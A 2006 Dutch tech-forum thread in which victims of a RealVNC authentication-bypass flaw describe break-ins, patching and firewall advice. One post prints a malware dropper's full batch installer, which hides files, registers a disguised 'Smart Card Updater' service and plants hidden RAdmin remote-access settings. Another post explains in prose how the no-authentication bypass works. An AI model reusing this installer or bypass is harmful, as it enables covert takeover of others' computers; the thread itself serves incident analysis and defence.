RealVNC security flaw waarschuwing

Geplaatst op zondag 21 mei 2006 18:24

Acties:

Door: RwinG

Berichten: 124
Reg. datum: 17 juni 2000

Tsjonge het is niet te geloven er is een toch nog een onverlaat op mijn PC binnen gekomen. Terwijl ik een hardware firewall heb, en Kerio Personal Firewall en Symantec Antivirus op mijn PC. Vanmorgen liep ik langs mijn PC die meestal aanstaat en zag er toevallig iemand remote op werken. Er werd via IE een exe gedownload. Ik probeerde op cancel te drukken en die gast maar dat windowtje verplaatsen zodat ik steeds miste, een muisgevecht dus, kolderiek.. Meteen het netwerk eruit getrokken.

Ik snapte er niks van hoe kon mij dat nou overkomen. Nou gewoon, slordigheidje dus. Ik moest een tijdje terug even vanuit mijn werk op mijn PC thuis dus had poort 5900 doorgezet naar mijn PC. Precies, de winvnc poort. En vergeten weer dicht te zetten! Er zat wel een wachtwoord op maar dat helpt niks meer als je RealVNC gebruikt. Er is onlangs een echt heel erge fout in RealVNC geconstateerd:

A "highly critical" flaw in RealVNC's virtual network computing software could allow malicious hackers to access a remote system without a password, according to a published advisory. RealVNC, the Cambridge, U.K.-based company that invented the open-source software, has acknowledged the flaw and posted patches for all affected versions

Dus, als je RealVNC heb draaien richting internet, meteen naar hun website en versie 4.1.2 downloaden!

Mocht je nieuwsgierig zijn wat die cracker aan het downloaden was, ik denk dat het een rootkit is. Dit is het pad naar de exe, voorzichtig ermee.

*knip*

(regels aan elkaar plakken)

Norton detecteert het trouwens wel gewoon dus dat was niet gelukt bij mij. Maar je staat toch raar te kijken

Ik hoop dat ik er op tijd bij was.

pasta wijzigde dit bericht 21-05-2006 19:18 (5%)

Geplaatst op zondag 21 mei 2006 18:39

Acties:

Door: moto-moi Serveradmin

Officieel ele fan

Berichten: 23.029
Reg. datum: 01 juli 2001

quote: http://secunia.com/advisories/20107/
Description:
Steve Wiseman has reported a vulnerability in RealVNC, which can be exploited by malicious people to bypass certain security restrictions.

The vulnerability is caused due to an error within the handling of VNC password authentication requests. This can be exploited to bypass authentication and allows access to the remote system without requiring knowledge of the VNC password.

The vulnerability has been reported in version 4.1.1. Other versions may also be affected.

Note: Version 4.0 is reportedly not affected.

Solution:
Update to Free Edition version 4.1.2 or Personal Edition/Enterprise Edition version 4.2.3.
http://www.realvnc.com/download.html

Provided and/or discovered by:
Steve Wiseman

Is toch (in ieder geval bij mij

) bekend vanaf 15 Mei ?

61=jiskefet | 06-15275070
God, root, what is difference? | Dell | Talga Vasrnicsteh | IBM zuigt

Geplaatst op zondag 21 mei 2006 18:54

Acties:

Door: Henk007

Berichten: 3062
Reg. datum: 10 december 2003

quote:
RwinG schreef op zondag 21 mei 2006 @ 18:24:
Mocht je nieuwsgierig zijn wat die cracker aan het downloaden was, ik denk dat het een rootkit is. Dit is het pad naar de exe, voorzichtig ermee.

Inderdaad een backdoor
Dit zegt Kaspersky:
Scanned file: ** filenaam ** - Infected
** filenaam **/data.rar/archive comment - OK
/data.rar/drvcc32.ini - OK
/data.rar/lspool.ini - OK
/data.rar/path.bat - OK
/data.rar/lspool.exe - infected by Backdoor.Win32.HacDef.f
/data.rar/spools.exe - OK
/data.rar/drvcc32.dll - OK
/data.rar/spools.dll - OK
/data.rar/spools.dat - OK

Ik zou de link maar weghalen. Aan het verspreiden van malware doen we hier niet mee.

Henk007 wijzigde dit bericht 21-05-2006 19:23 (14%)

Geplaatst op zondag 21 mei 2006 19:07

Acties:

Door: Evilman

Berichten: 229
Reg. datum: 27 januari 2001

het installeerd een Serv-u FXP server...

als je de bestanden bekijkt in notepad etc...

Poorten wat het tooltje gebruikt
TCP:60800,45000,8277
UDP:60800,45000,8277

het maakt deze bestanden (mappen) aan
md "%systemroot%\system32\spool\PRINTERS\Printers.{2227A280-3AEA-1069-A2DE-08002B30309D}\FXP\FXP.Area\racedir.01\00 _ aPoCalYpSe FXP Server _ ^ Hacked by eXiLe"
md "%systemroot%\system32\spool\PRINTERS\Printers.{2227A280-3AEA-1069-A2DE-08002B30309D}\FXP\FXP.Area\racedir.02\00 _ aPoCalYpSe FXP Server _ ^ Hacked by eXiLe"
md "%systemroot%\system32\spool\PRINTERS\Printers.{2227A280-3AEA-1069-A2DE-08002B30309D}\FXP\FXP.Area\racedir.03\00 _ aPoCalYpSe FXP Server _ ^ Hacked by eXiLe"
md "%systemroot%\system32\spool\PRINTERS\Printers.{2227A280-3AEA-1069-A2DE-08002B30309D}\FXP\FXP.Area\racedir.04\00 _ aPoCalYpSe FXP Server _ ^ Hacked by eXiLe"
md "%systemroot%\system32\spool\PRINTERS\Printers.{2227A280-3AEA-1069-A2DE-08002B30309D}\FXP\FXP.Area\racedir.05\00 _ aPoCalYpSe FXP Server _ ^ Hacked by eXiLe"

bedankt voor de tip kan meteen ff al me VNC clients servers updaten

Evilman wijzigde dit bericht 21-05-2006 19:08 (4%)

Geplaatst op zondag 21 mei 2006 19:18

Acties:

Door: pasta Moderator BV/CSA

Theezak er maar in

Berichten: 13.664
Reg. datum: 15 september 2002

Ik heb toch even de URL weggesloopt, hoewel het niet klikbaar werd gemaakt blijft het toch verraderlijk, vooral omdat de complete payload van het bestand niet bekend is.

Are you my virgins?
---
<zeef> gaan jullie het zelf vertellen of moet er gedanny-d worden?

Geplaatst op zondag 21 mei 2006 19:28

Acties:

Door: OhMyGod

omg

Berichten: 1314
Reg. datum: 12 april 2001

Ik had hier laatst idd ook wat over gelezen. Maar dat het zo gevoelig was wist ik ook nog niet.

VNC gebruik ik zakelijk en prive gigantisch vaak om mensen een beetje op weg te kunnen helpen. Dat wordt toch flink patchen de volgende week.

Wapnet.nl

Geplaatst op zondag 21 mei 2006 21:39

Acties:

Door: KingOfDos

C:\DOS>_

Berichten: 6836
Reg. datum: 15 oktober 2001

quote:
OhMyGod schreef op zondag 21 mei 2006 @ 19:28:
VNC gebruik ik zakelijk en prive gigantisch vaak om mensen een beetje op weg te kunnen helpen. Dat wordt toch flink patchen de volgende week.

Onder Windows XP en Windows 2003 heb je de beschikking over RDP, maak gebruik van deze feature, dat is veiliger dan VNC (zover ik weet).

Dan komt er nog eens bij kijken, dat je alle high-access services bv in een VPN hangt, zodat dit niet eens kan voorkomen. VNC, RDP, en alle andere services die de mogenlijkheid hebben om "volledige toegang" te voorzien vanaf internet vallen hier dus onder.

Ik heb op mijn netwerk enkel poort 80 (HTTP) en 22 (SSH) open staan. De overige services zijn voor mij benaderbaar via een SSH tunnel, zodat andere mensen er gewoon niet op kunnen.

Vertrouw niemand, vertrouw geen enkel programma, vertrouw niets! Een dicht netwerk, is een veilig netwerk.

[Avatar Change/Stats (terug online!!)]
Bye bye Microsoft ! I'm using Linux now!

Geplaatst op zondag 21 mei 2006 21:47

Acties:

Door: RwinG

Berichten: 124
Reg. datum: 17 juni 2000

quote:
pasta schreef op zondag 21 mei 2006 @ 19:18:
Ik heb toch even de URL weggesloopt, hoewel het niet klikbaar werd gemaakt blijft het toch verraderlijk, vooral omdat de complete payload van het bestand niet bekend is.

Ok. Als er toch een nieuwsgierige tweaker is die wil weten wat voor dreigingen je zoal in het echt tegen komt, laat maar weten. Ik heb hier die FXP server met ingebouwde Hacker Defender rootkit nog ergens liggen

Mocht je door een dergelijke FTP server met Hacker Defender besmet zijn dan kan dit helpen:
http://bagpuss.swan.ac.uk/comms/hxdef.htm

Ik ben even rond gaan zoeken en je kunt die rootkits zo van internet plukken. Maar daar gaan we dan maar even niet op in hier.

Geplaatst op maandag 22 mei 2006 22:13

Acties:

Door: Fairy

Loves Blue-eyess 4 ever

Berichten: 12.833
Reg. datum: 07 januari 2001

Hoppa, ik had vandaag ook iemand die op mijn VNC wilde inloggen!

Helaas het IP niet kunnen zien op tijd, begon met 80 dacht ik.
Heb VNC zo ingesteld dat ie 3 seconden wacht voordat het loginscherm komt, op het scherm krijg ik dan een popup.

Ik gebruik de laatste UltraVNC en log nog wel eens in vanuit werk. UltraVNC er toch maar af kieperen?

EOS 5D | 17-40L | 24-70 2.8L | 70-200 2.8L IS + 1.4x + 2.0x TCII | 50mm 1.4 | 85mm 1.8 | 580EX + 430EX II
Blue-eyess isse mijn !

Geplaatst op maandag 22 mei 2006 22:18

Acties:

Door: Zwerver

Just my two cents....

Berichten: 8469
Reg. datum: 19 februari 2001

Nee, ik zou gewoon een perl-scriptje zoals deze draaien dan weet je direct of je VNC vulnerable is. Daarbij is er allang een update, dus waarom zou je UltraVNC verwijderen? Gewoon updaten die handel!

Heeft heimwee naar Oz
Sorry no have...

<fee-tje> de seks op moam zuigt sowieso
<fee-tje> nja, behalve die keer met moto-moi dan

Geplaatst op maandag 22 mei 2006 22:24

Acties:

Door: Fairy

Loves Blue-eyess 4 ever

Berichten: 12.833
Reg. datum: 07 januari 2001

quote:
Zwerver schreef op maandag 22 mei 2006 @ 22:18:
Nee, ik zou gewoon een perl-scriptje zoals deze draaien dan weet je direct of je VNC vulnerable is. Daarbij is er allang een update, dus waarom zou je UltraVNC verwijderen? Gewoon updaten die handel!

leuk maar hoe draai ik een perl scriptje

EOS 5D | 17-40L | 24-70 2.8L | 70-200 2.8L IS + 1.4x + 2.0x TCII | 50mm 1.4 | 85mm 1.8 | 580EX + 430EX II
Blue-eyess isse mijn !

Geplaatst op maandag 22 mei 2006 22:42

Acties:

Door: Zwerver

Just my two cents....

Berichten: 8469
Reg. datum: 19 februari 2001

Perl installeren op je windowspc: http://www.perl.com/download.csp#win32

En daarna gewoon compilen

Beetje googlen doet wonderen

Heeft heimwee naar Oz
Sorry no have...

<fee-tje> de seks op moam zuigt sowieso
<fee-tje> nja, behalve die keer met moto-moi dan

Geplaatst op dinsdag 23 mei 2006 09:13

Acties:

Door: Fairy

Loves Blue-eyess 4 ever

Berichten: 12.833
Reg. datum: 07 januari 2001

quote:
Zwerver schreef op maandag 22 mei 2006 @ 22:42:
Perl installeren op je windowspc: http://www.perl.com/download.csp#win32

En daarna gewoon compilen Beetje googlen doet wonderen

Laat maar zitten...

Niet iedereen is een programmeur die alles kan en weet.

Fairy wijzigde dit bericht 23-05-2006 09:14 (11%)

EOS 5D | 17-40L | 24-70 2.8L | 70-200 2.8L IS + 1.4x + 2.0x TCII | 50mm 1.4 | 85mm 1.8 | 580EX + 430EX II
Blue-eyess isse mijn !

Geplaatst op dinsdag 23 mei 2006 11:23

Acties:

Door: Zwerver

Just my two cents....

Berichten: 8469
Reg. datum: 19 februari 2001

quote:
Fairy schreef op dinsdag 23 mei 2006 @ 09:13:
[...]

Laat maar zitten...

Niet iedereen is een programmeur die alles kan en weet.

Dat zeg ik ook niet

Ik wijs je naar de installatiebinary en ik zeg daarnaast dat je even moet googlen om te kijken hoe je het verder moet aanroepen

Ik heb geen Windows, dus ik zou niet exact weten hoe je het moet doen

Niks ten nadele van je hoor

Heeft heimwee naar Oz
Sorry no have...

<fee-tje> de seks op moam zuigt sowieso
<fee-tje> nja, behalve die keer met moto-moi dan

Geplaatst op dinsdag 23 mei 2006 21:47

Acties:

Door: SjOuKeS

HmmmmPie!!!!

Berichten: 623
Reg. datum: 26 augustus 2000

2 pc's van mij die niet op IP waren vast gezet met VNC zijn ook gehacked..
Heb het bestand kunnen achterhalen waar de hacks inzaten (eVolite.exe)..
SFX (RAR) image met silent en autoinstall tag's
Het staat (nog steeds) gehost bij een members.home.nl account.
Heb @home zondag verwittigd van dit gebeuren via abuse maar natuurlijk is hier nog niks mee gedaan. Stukje (batch) code voor de geinteresseerden..

Files
code:

23-05-2006  21:43    <DIR>          .
23-05-2006  21:43    <DIR>          ..
07-09-2001  15:00           273.901 scardupd.exe
07-09-2001  15:00            28.672 srv.exe
07-09-2001  15:00            16.821 wrt.acx
23-05-2005  17:51         1.628.184 dhcpcl.exe
07-09-2001  15:00             1.792 install.bat
07-09-2001  15:00            34.304 rgv.exe

code:

md %windir%\system32\dhcp
move wrt.acx %windir%\system32\dhcp
move dhcpcl.exe %windir%\system32\dhcp
move scardupd.exe %windir%\system32
move trkupd.exe %windir%\system32
attrib +h +s -r %windir%\system32\dhcp
attrib +h +s -r %windir%\system32\dhcp\dhcpcl.exe
attrib +h +s -r %windir%\system32\dhcp\wrt.acx
attrib +h +s -r %windir%\system32\scardupd.exe
attrib +h +s -r %windir%\system32\trkupd.exe
srv install SCardUpd /n:"Smart Card Updater" /b:%windir%\system32\scardupd.exe /u:localsystem /s:auto /i:yes
rgv -addkey \HKLM\SYSTEM\RAdmin
rgv -addkey \HKLM\SYSTEM\RAdmin\v2.0
rgv -addkey \HKLM\SYSTEM\RAdmin\v2.0\Server
rgv -addkey \HKLM\SYSTEM\RAdmin\v2.0\Server\Parameters
rgv -addkey \HKLM\SOFTWARE\RAdmin
rgv -addkey \HKLM\SOFTWARE\RAdmin\v1.01
rgv -addkey \HKLM\SOFTWARE\RAdmin\v1.01\ViewType
rgv -set REG_BINARY \HKLM\SYSTEM\RAdmin\v2.0\Server\Parameters\DisableTrayIcon=01000000
rgv -set REG_BINARY \HKLM\SYSTEM\RAdmin\v2.0\Server\Parameters\Port=3b0d0000
rgv -set REG_BINARY \HKLM\SYSTEM\RAdmin\v2.0\Server\Parameters\Parameter=ae51eaa4c93559b753a42274aafe45ac
rgv -set REG_BINARY \HKLM\SOFTWARE\RAdmin\v1.01\ViewType\Data=01f699b0575c1380186ff3fc68838ebfca4a9c5eccf98e7c3172ae28315e990b9fa48961fc0ce34750e30608f0552b80b3d4c0a8153627f05f8ef7b0f5b04bdb
rgv -set REG_EXPAND_SZ "\HKLM\SYSTEM\CurrentControlSet\Services\SCardUpd\ImagePath=%windir%\system32\scardupd.exe /service"
rgv -set REG_SZ "\HKLM\SYSTEM\CurrentControlSet\Services\SCardUpd\Description=Provides updates for legacy smart card readers attached to the computer."
%windir%\system32\dhcp\dhcpcl.exe -install
%windir%\system32\trkupd.exe -:installonly
srv start dhcpcl
srv start scardupd
srv start trkupd
del msg.txt
del rgv.exe
del evolite.exe
del script.vbs
del srv.exe
del install.bat

Eens geinstalleerd installed hij nog 3 services die ik na veel zoeken kon verwijderen dmv verschillende tools van sysinternals.
Nog steeds zit ik met gehookte dll's maar de serv-u server die geinstalleerd word is in iedergeval niet meer actief. En word er (volgens TCPmon) niet meer geluisterd op de verschillende poorten..

SjOuKeS wijzigde dit bericht 23-05-2006 21:51 (13%)

Geplaatst op dinsdag 23 mei 2006 22:43

Acties:

Door: RwinG

Berichten: 124
Reg. datum: 17 juni 2000

Intussen bleef ik een kriebelig gevoel hebben -- hoe veel mensen hebben mijn desktop voor hun neus gehad?? Ik moest voor wat anders in de Application event log zijn en tsjonge, RealVNC logt daar alle connecties!

http://img210.imageshack.us/img210/4103/realvnchacked9up.gif

Je ziet steeds connecties die opgebouwd worden en direkt weer afgebroken. Dat zijn lui die geprobeerd hebben om via de VNC poort binnen te komen maar het password niet wisten. De bovenste, die heeft dus 3,5 minuut de tijd gehad om aan te rommelen maar gelukkig zag ik hem. In de properties van dit event staat:

Connections: closed: 80.178.137.11::4737 (read: Connection reset by peer (10054))

"reset bij peer" .. inderdaad de netwerkkabel eruit gerukt

En verder is er dus niemand binnengeweest - geen schade dus! Het is trouwens een Italiaans IP nummer: 80.178.137.11.adsl.012.net.il [80.178.137.11]

RwinG wijzigde dit bericht 23-05-2006 22:46 (13%)

Geplaatst op dinsdag 23 mei 2006 23:24

Acties:

Door: Rob

Berichten: 3879
Reg. datum: 02 februari 2000

Ik heb even zitten googlen: alleen realvnc (en niet alle oude versies) heeft dit probleem. Ultra en tightvnc zijn safe.
http://www.intelliadmin.c...-flaw-in-realvnc-411.html

In the beginning the Internet was a bunch of smart users with dumb terminals. Now...

Geplaatst op dinsdag 23 mei 2006 23:44

Acties:

Door: hawk88

Berichten: 57
Reg. datum: 12 augustus 2005

lijkt meer op een Iraelisch IP
code:

 This is the RIPE Whois query server #1.
% The objects are in RPSL format.
%
% Note: the default output of the RIPE Whois server
% is changed. Your tools may need to be adjusted. See
% http://www.ripe.net/db/news/abuse-proposal-20050331.html
% for more details.
%
% Rights restricted by copyright.
% See http://www.ripe.net/db/copyright.html

% Note: This output has been filtered.
%       To receive output for a database update, use the "-B" flag.

% Information related to '80.178.131.0 - 80.178.142.255'

inetnum:    80.178.131.0 - 80.178.142.255
netname:    GOLDENLINES-ADSL
descr:            Please Send Abuse/SPAM complaints To Abuse@012.net.il
country:    IL
admin-c:    DR5299-RIPE
tech-c:        DR5299-RIPE
status:        ASSIGNED PA
mnt-by:        AS9116-MNT
mnt-lower:    AS9116-MNT
source:        RIPE # Filtered

role:           DNS REG
address:        25 Hsivim st. Petach-Tiikva, Israel
admin-c:        KI373-RIPE
tech-c:         AG914-RIPE
tech-c:         KI373-RIPE
nic-hdl:        DR5299-RIPE
mnt-by:         AS9116-MNT
source:         RIPE # Filtered
abuse-mailbox:  abuse@012.net.il

% Information related to '80.178.137.0/24AS9116'

route:          80.178.137.0/24
descr:          Golden Lines
origin:         AS9116
mnt-by:         AS9116-MNT
source:         RIPE # Filtered

home:Amd4000+,1Gbddr400,7800GT,120gbS-ata,250s-ata,dvd-rw dl,ubuntu en xp( games),klaptop:1.73M,x700,1Gb(centrino),80gb,Xp

Geplaatst op dinsdag 23 mei 2006 23:46

Acties:

Door: Fairy

Loves Blue-eyess 4 ever

Berichten: 12.833
Reg. datum: 07 januari 2001

Bij mij probeert een 87.106.4.206 steeds te connecten. Is nu al 2 dagen bezig. Nog effe en ik ga die provider een abusemail sturen.

EOS 5D | 17-40L | 24-70 2.8L | 70-200 2.8L IS + 1.4x + 2.0x TCII | 50mm 1.4 | 85mm 1.8 | 580EX + 430EX II
Blue-eyess isse mijn !

Geplaatst op woensdag 24 mei 2006 00:06

Acties:

Door: RwinG

Berichten: 124
Reg. datum: 17 juni 2000

quote:
hawk88 schreef :
lijkt meer op een Iraelisch IP

Ach ja inderdaad, geen .it maar .il - ik moet mijn lenzen schoonmaken

quote:
Fairy schreef :
Bij mij probeert een 87.106.4.206 steeds te connecten. Is nu al 2 dagen bezig. Nog effe en ik ga die provider een abusemail sturen.

Domein naam is s15210515.onlinehome-server.info en er draait een IE webserver en een FTP server. Geen anonieme toegang trouwens

"schlund+partner" als provider.. hoe is je Duits ??

Edit: En via die link van Zwerver vind je een Perl script waar je mee kunt scannen. Ik neem aan dat dit nu wijdverbreid door scriptkiddies gedraaid wordt. Dan vind je steeds connects en disconnects in de log neem ik aan.

Het veiligheidsgat is echt knullig naar ik begrijp, zie Perl script. De client en de server onderhandelen over de authenticatie, dus de manier waarop de beveiliging wordt toegepast. Als je nu een client maakt die aangeeft dat hij alleen maar authenticatie type '0000' ondersteund dan zegt RealVNC server "ok, die krijg je". Alleen jammer dat '0000' staat voor geen authenticatie. Dus dan kom je zonder password binnen! Kwestie dus van de source wat aanpassen, opnieuw compileren en je hebt een viewer die op al deze brakke RealVNC servers die je net met de Perl scanner hebt gevonden binnen kan komen.

RwinG wijzigde dit bericht 24-05-2006 00:15 (43%)

Geplaatst op donderdag 25 mei 2006 20:54

Acties:

Door: S-Cript

Berichten: 178
Reg. datum: 02 augustus 2001

Dinsdag op woensdag had ik er 1tje,
door een onvoorziene herstart stond VNC ook weer eens aan,

en ja hoor we hebben een 'oetlul' die deze 'exploit' wilt testen.

Event Type: Information
Event Source: WinVNC4
Event Category: None
Event ID: 1
Date: 24-5-2006
Time: 1:46:23
User: N/A
Computer: PC-BOVEN
Description:
Connections: accepted: 84.41.137.23::48752

ipv alleen testen,vond deze persoon het aangenaam om 300 uur aan digitaliseren
van Muziekcassettes te verwijderen,
gelukkig door recoverysoftware+een recente backup heb ik 250 uur kunnen redden.

mailtje naar abuse@speedlinq leverde mij een mail naar XB op.
en laat XB nu net de provider zijn ,waar de holding,waar ik werkzaam voor ben,een
mega contract hebben en ik meerdere malen per maand in gesprek ben met dit aardige bedrijf,
maandag eens bellen om te kijken of we via een andere kant deze persoon eens kunnen
'screwen'

niets bijzonders

Geplaatst op vrijdag 26 mei 2006 00:40

Acties:

Door: 80000

mrox

Berichten: 120
Reg. datum: 07 januari 2002

quote:
S-Cript schreef op donderdag 25 mei 2006 @ 20:54:
Dinsdag op woensdag had ik er 1tje,
door een onvoorziene herstart stond VNC ook weer eens aan,

en ja hoor we hebben een 'oetlul' die deze 'exploit' wilt testen.

Event Type: Information
Event Source: WinVNC4
Event Category: None
Event ID: 1
Date: 24-5-2006
Time: 1:46:23
User: N/A
Computer: PC-BOVEN
Description:
Connections: accepted: 84.41.137.23::48752

'screwen'

Precies dezelfde IP adres, heeft ook bij mij huisgehouden en mijn data bestanden verwijderd.
Zal morgen ook een mail naar speedlinq sturen.

Geplaatst op vrijdag 26 mei 2006 15:43

Acties:

Door: itsalex

Berichten: 1954
Reg. datum: 27 januari 2003

Ik zie het al jaren dat ze bij een klant van mij bezig zijn om in te breken en ook vanuit Italie. ik heb nu voor het eerst gehoord van een klant. Die heeft mij vannacht om 3.30 gebeld of ik bezig was maar ik kon niets ontdekken op het systeem. Maar een andere server heeft er steeds last van. Ik weet niet hoe ik het moet ontmoedigen. Ik heb wel een wachtwoord en een NT wachtwoord erop gezet dus verder dan dat kom je niet.

itsalex wijzigde dit bericht 26-05-2006 15:44 (10%)

ff wachten ....

Geplaatst op zaterdag 27 mei 2006 12:33

Acties:

Door: duhtje

blabla

Berichten: 61
Reg. datum: 27 oktober 2003

Ik had precies hetzelfde. Een uur geleden zat ik op mijn pc te werken en ineens begon de muis te bewegen. VNC gaf aan dat er iemand op mijn systeem zat te werken. Direct netwerk uitgeschakeld. Bleek dat de gast vannacht zelfs mijn virusscanner al had verwijderd.

Nou ja, snel de nieuwe versie installeren en hopelijk gebeurd het niet nog eens ;-)

Wel balen... nu moet ik wegens veiligheidsoverwegingen al mijn wachtwoorden aanpassen :-(

Geplaatst op zaterdag 27 mei 2006 12:47

Acties:

Door: axis

nog een ms certified prutser

Berichten: 3381
Reg. datum: 28 juni 2000

quote:
itsalex schreef op vrijdag 26 mei 2006 @ 15:43:
Ik zie het al jaren dat ze bij een klant van mij bezig zijn om in te breken en ook vanuit Italie. ik heb nu voor het eerst gehoord van een klant. Die heeft mij vannacht om 3.30 gebeld of ik bezig was maar ik kon niets ontdekken op het systeem. Maar een andere server heeft er steeds last van. Ik weet niet hoe ik het moet ontmoedigen. Ik heb wel een wachtwoord en een NT wachtwoord erop gezet dus verder dan dat kom je niet.

In de firewall alleen die hosts toestaan die erop moeten kunnen? En als het een standalone windows bak is, en er geen firewall voor staat, of die jij niet beheert, kun je ook nog een ipsec filter op die machine zelf zetten om port filtering te doen.. Kun je het zelf in de hand houden.

Two advices for network troubleshooting.. learn to draw diagrams in Visio, and THINK IN LAYERS!

Gathering of Tweakers

Update Tracker

Active Topics

Frontpage Nieuws